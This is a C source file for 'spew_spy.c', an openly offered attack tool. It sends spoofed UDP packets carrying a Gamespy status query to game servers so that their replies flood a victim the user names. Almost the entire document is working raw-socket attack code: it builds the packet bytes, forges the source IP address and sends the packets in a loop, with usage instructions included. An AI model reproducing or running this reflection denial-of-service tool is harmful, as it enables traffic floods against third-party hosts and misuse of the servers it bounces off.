Spew_spy.c sends spoofed UDP packets to a Gamespy-enabled game server, causing it to spew packets at a target of the user's choice.
7e4eec1e353c39d1438682695bca9c0100dcc993d6a7c20899a1f81a6fa6ca8e
/*
spew_spy.c
Version 0.1
By Wraithnix (wraithnix@riotmod.com)
Based on arnudp.c version 0.01 by Arny - cs6171@scitsc.wlv.ac.uk
Sends spoofed UDP packets to a Gamespy-enabled game server,
thusly causing the server to spew packets at a target of the user's
choice.
Exploit discovered by PivX
Check http://www.pivx.com/kristovich/adv/mk001 for more info
User needs root privledges to run.
Compiled and tested on Lyconis Linux.
*/
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in_systm.h>
#include<netinet/in.h>
#include<netinet/ip.h>
#include<netinet/udp.h>
#include<errno.h>
#include<string.h>
#include<netdb.h>
#include<arpa/inet.h>
#include<stdio.h>
struct sockaddr sa;
main(int argc,char **argv)
{
int fd;
int x=1;
int packetssent;
int maxpackets;
struct sockaddr_in *p;
struct hostent *he;
u_char gram[63]=
{
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xFF, 0x11, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0x00, 0x12, 0x00, 0x00,
'\\','\\','p','l','a','y','e','r','s','\\','\\',
's','t','a','t','u','s','\\','\\',
'p','a','c','k','e','t','s','\\','\\',
'r','u','l','e','s','\\','\\'
};
if(argc!=6)
{
printf("spew_spy.c\nWritten by Wraithnix(wraithnix@riotmod.com)\n");
fprintf(stderr,"usage: %s <IP/hostname> <port> <target IP/hostname> <target port> <# of packets>\n",*argv);
exit(1);
};
printf("spew_spy.c\nWritten by Wraithnix(wraithnix@riotmod.com)\n");
if((he=gethostbyname(argv[1]))==NULL)
{
printf("Error resolving hostname.\n");
exit(1);
};
bcopy(*(he->h_addr_list),(gram+12),4);
if((he=gethostbyname(argv[3]))==NULL)
{
printf("Error resolving target hostname.\n");
exit(1);
};
bcopy(*(he->h_addr_list),(gram+16),4);
*(u_short*)(gram+20)=htons((u_short)atoi(argv[2]));
*(u_short*)(gram+22)=htons((u_short)atoi(argv[4]));
maxpackets=atoi(argv[5]);
p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
{
printf("You need to have root privledges to run this program.\n");
exit(1);
};
printf("Sending spoofed packets: ");
for (packetssent = 0; packetssent < maxpackets; packetssent++) {
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
{
printf("Error sending spoofed UDP packets..\n");
exit(1);
};
printf("#");
}
printf("\nDone!\n");
}